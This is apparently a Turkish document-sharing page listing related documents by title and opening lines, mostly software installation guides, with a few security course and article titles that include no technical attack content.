İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ Öğr.Gör. Mehmet DEMİR HOMEWORK 1: Linux Kurulumu(Sanal) ve Linux İşletim Sistemine Yeni Kernel Kurulumunun
DetaylıEnlil programını açtığımızda karşımıza gelen ilk ekrandır.bu ekranda özel tanımlanmış kullanıcı kodu ve parola ile programa giriş sağlanmaktadır.
Enlil programını açtığımızda karşımıza gelen ilk ekrandır.bu ekranda özel tanımlanmış kullanıcı kodu ve parola ile programa giriş sağlanmaktadır. Özel tanımlanmış kullanıcı kodu ve parola girildikten sonra
DetaylıNPratik Yazılım Kurulum Kılavuzu. Yedekleme İşlemi
NPratik Yazılım Kurulum Kılavuzu Herhangi bir neden ile bilgisayarınızı formatlamadan önce NPratik Yazılım Verilerinizi yedeklemeniz gerekmektedir. Programı ilk defa kuruyorsanız NPratik Yazılım Kurulum
DetaylıMetin Editörleri YRD. DOÇ. DR. ENGİN CEMAL MENGÜÇ. ALINTI:
1 Metin Editörleri YRD. DOÇ. DR. ENGİN CEMAL MENGÜÇ ALINTI: https://webmaster.kitchen Metin Editörleri 2 Bir web sitesi geliştirmek istiyorsanız, bir HTML düzenleyicisine ihtiyacınız olacaktır. Elbette
DetaylıBAY.t Entegre. Aşağıdaki script fiyat gör programının ayarlar sayfasındaki sorgu cümlesi alanına yapıştırılıp Sorguyu Db ye Yükle tıklanır
Bu dokümanda Perkon Fiyat Gör cihazlarının BAY.t Entegre ve BAY.t Entegre PRO programlarına ait firma dosyalarına bağlantının nasıl yapılacağını anlatılmıştır. BAY.t Entegre PRO Fiyat gör programının ayarlar
DetaylıWindows Server 2012 Kurulum Hazırlıkları. Windows Server 2012 Kurulum Seçenekleri. Windows Server 2012 Kurulum Adımları. Full GUI Kurulum Seçeneği
Merhaba, Aşağıda hazırlamış olduğum dokümanda Windows Server 2012 işletim sistemi kurulumunu sizlerle paylaşacağım. Windows Server 2012 Kurulum Hazırlıkları Eğer elinizde bir Windows Server 2012 işletim
DetaylıMpuantor 2.7 Client Kurulumu
Mikado Puantör 2.7 Mpuantor 2.7 Client Kurulumu 10.10.2014 Ümit Dinçer 2014,. Tüm Hakları Saklıdır. Mpuantor 2.7 Client Kurulumu i İ Ç İ N D E K İ L E R Mpuantor Yedekleme... 1 Mpuantor yedeklemesi...
DetaylıFABREKA YAZILIM ELEKTRONİK DANIŞMANLIK TİC. LTD. ŞTİ.
FABREKA YAZILIM ELEKTRONİK DANIŞMANLIK TİC. LTD. ŞTİ. VEBIAN V1.6 KURULUM DOKÜMANI 29.08.2015 İçindekiler Amaç ve Kapsam... 2 Sistem Gereksinimleri... 3 Kurulum Adımları... 4 Başlamadan Önce... 4 Kurulum
DetaylıSparkleShare. Çağrı Emer. Ekim, 2011
SparkleShare Çağrı Emer Ekim, 2011 İçindekiler 1 Giriş.................................................... 2 2 GitHub ile Kurulum............................................ 5 3 Kendi Sunucumuza Kurulum.......................................
DetaylıSQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU
SQL 2005 SQL STUDIO MANAGER ACP YAZILIMI KURULUM KILAVUZU Sayfa 1 / 18 KURULUMA BAŞLANMADAN ÖNCE YAPILMASI GEREKENLER : Sistem Özelliklerinden işletim sisteminin 32-bit mi yoksa 64-bit mi olduğu kontrol
DetaylıEcofont Yazılım Kullanıcı Rehberi
Ecofont Yazılım Kullanıcı Rehberi Ecofont Yazılım, baskılarınızı yaparken %50 ye, ve hatta resimsiz yazdırma seçeneğini kullandığınızda çok daha fazlasına varan tasarruf yapmanızı sağlar. Sadece tek bir
Detaylıİçindekiler Hitit Sayım Cihazı Kurulum ve Kullanım Kılavuzu... 2 Sayım Cihazı Kurulum İşlemleri... 2 Hitit Kurulum işlemleri...
1 İçindekiler Hitit Sayım Cihazı Kurulum ve Kullanım Kılavuzu... 2 Sayım Cihazı Kurulum İşlemleri... 2 Hitit Kurulum işlemleri... 5 Cihazdan Sayım İşlemleri... 8 Sayım Dosyasının Hitit e Okutulması...
DetaylıJava JDK (Java Development Kit) Kurulumu:
Java JDK ve Eclipse Kurulumu Öncelikle java ile program geliştirmeye başlamak istiyorsanız iki şeye ihtiyacınız olacak; 1-Java JDK (Java Development Kit) : Java ile yazdığımız kodları derleyip çalıştırmak
DetaylıKomut Satırının Gücü Adına!
Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012
DetaylıBo lu m 7: Hesap Tabloları
Bo lu m 7: Hesap Tabloları Konu 1: Dosya, Tablo ve Grafik Oluşturma Hazırlayan: S.Engin Koç Bu konu bittiğinde; Dosya oluşturma ve tabloya şekil verme Tabloya sütun, satır ekleme ve hücreleri biçimlendirme
DetaylıExploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Exploit Geliştirme Altyapıları Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Önerilen Yazılımlar
DetaylıZilabs VoIP uygulaması için ADSL Ayarları
Zilabs VoIP uygulaması için ADSL Ayarları VoIP üzerinden santralinize çağrıların gelebilmesi için yapılması gereken iki temel aşama vardır: Statik IP adresine sahip olmak ve ADSL modeminizde port yönlendirmesi
DetaylıC için tümleşik geliştirme ortamı (IDE) kurulumları
C için tümleşik geliştirme ortamı (IDE) kurulumları 1. Code::Blocks IDE 2. Eclipse IDE 3. Dev-C++ IDE 4. Code::Blocks EDU-Portable (CodeBlocks-EP) IDE ( IDE: Integrated Development Environment http://tr.wikipedia.org/wiki/t%c3%bcmle%c5%9fik_geli%c5%9ftirme_ortam%c4%b1
DetaylıUzak Masaüstü Lisans Server ı Aktive Etme
Uzak Masaüstü Lisans Server ı Aktive Etme (Windows Server 2012) Özet: Windows Server 2012 üzerinde Uzak Masaüstü Lisans Server ı konfigure etmek, Windows Server 2008 R2 den çok farklıdır. Workgroup içerisinde
Detaylı02 Temmuz İlgili Versiyon/lar: ETA:SQL, ETA:V.8-SQL. İlgili Modül/ler: Muhasebe IV
02 Temmuz 2018 İlgili Versiyon/lar: ETA:SQL, ETA:V.8-SQL İlgili Modül/ler: Muhasebe IV MUHASEBE IV MODÜLÜ İNDİRİMLİ ORANLARA AİT SATIŞ LİSTESİ İndirimli Oranlara ait Satış Listesi raporu 405 (İndirimli
DetaylıVEGAWIN BELGE CONVERTER
VEGAWIN BELGE CONVERTER Müşterilerimizin veya bayilerimizin excel,txt dosya formatında gelen alış faturaları,sipariş belgeleri veya alış irsaliyelerini Vegawine aktarabileceği kullanımı kolay bir programdır.
DetaylıTeknoloji Özeti vspace Kurulum Değişiklikleri Windows Yükleyicisi.MSI
Teknoloji Özeti vspace Kurulum Değişiklikleri Windows Yükleyicisi.MSI NComputing in vspace yazılımı sürekli updateler ve gelişimler geçirmektedir. En son olarak biz setup ve kurulum sürecimizi Windows
DetaylıETA:MOBİL KURULUM TALİMATI
ETA:MOBİL KURULUM TALİMATI ETA:Mobil Kurulum Adımları Kuruluma başlamadan önce ana bilgisayarınızda kontrol etmeniz gereken minimum gereksinimler aşağıda belirtilmiştir. 1. Microsoft Windows Versiyon Kurulum
DetaylıBaşlangıç Ayarları. www.trippersoft.com
Başlangıç Ayarları www.trippersoft.com Tripper > Kullanıcı Ayarları 1 LOGO Sys de TRİPPER kullanacaklar için birer kullanıcı açıyoruz. (Bu kullanıcıların her biri için LOGO programı içinde SATIŞ ELEMANI
DetaylıMY PANEL METER KULLANIM KILAVUZU
MY PANEL METER KULLANIM KILAVUZU EPA100 cihazınızı USB ile bilgisayarınıza bağlayarak çeşitli ayarlar yapabilir, okunan değerlerin grafiğini çıkartabilir, cihaz üzerinde yaptığınız bütün fonksiyonlara
DetaylıPERKON PDKS Kurulum ve hızlı başlangıç rehberi
Oluşturma 02.11.2015 Revizyon: 19.01.2016 Rev. No: 03 Yazan: Süleyman FAKİR Düzenleyen: F. DELİRİ PERKON PDKS Kurulum ve hızlı başlangıç rehberi 1) PDKS Kurulumu, Lisans Onaylaması Ve Veri Tabanı Ayarları
DetaylıVeri Tabanı Yönetim Sistemleri Bölüm - 02
Veri Tabanı Yönetim Sistemleri Bölüm - 02 İçerik Web sunucusunun yapılandırılması için gerekli yazılımların temini Yazılımlarının sunucuya yüklenmesi Ön test Uygulama yazılımlarının yapılandırılması Son
DetaylıAğ Üzerinde MATLAB kurulum rehberi (Sunucu makine)
Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine) İçindekiler Tablosu Dosyaların Bilgisayara İndirilmesi... 3 Dosyaların Bilgisayara Yüklenmesi... 5 1. İnternet Üzerinden Kurulum 5 1.1. Lisans Dosyasının
DetaylıYerel Ağlarda Port 139 ve Saldırı Yöntemi
Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu
DetaylıKılavuz içerisinde sisteme ait tüm özellikler anlatılmakta olup, yapacağınız konfigürasyonlar satın aldığınız lisans ile sınırlıdır.
1 HAKKIMIZDA Aktiftelecom, 1994 yılından bu yana deneyimli kadrosu ile telekomünikasyon sektöründe hizmet vermektedir. Satış sonrası hizmetler konusunda uzmanlaşmış teknik destek ekibi ve yurt çapında
DetaylıLogo Mobile Kurulum ve Kullanım
Logo Mobile Kurulum ve Kullanım Logo Mobile Ürünlerimize entegre olarak raporlama çözümleri sunan Logo Mobile ürünümüz kullanıma sunulmuştur. Ürünün kurulum ve kullanım detaylarına bu makaleden erişebilirsiniz.
DetaylıNACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU
NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU NACA kesit programı çizim programı Visual Basic V5.0 dilinde yazılmıştır. Programın amacı, kullanıcının istediği NACA kesitinin çizimini çok
DetaylıWOLVOX Mobil Satış PDA
AKINSOFT Yardım Dosyası Doküman Versiyon : 1.02.01 Tarih : 01.Mart.2011 Sayfa 1 İçindekiler Dizini 1. ÇALIŞMA SİSTEMİ HAKKINDA KISA BİLGİ...3 2. BAĞLANTISI VE KULLANIMI...3 2.1. Ayarlar...3 2.2. Merkez
DetaylıWindows Hacking - II
BGM 554 - Sızma Testleri ve Güvenlik Denetlemeleri-II Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016/2017 - Bahar
Detaylı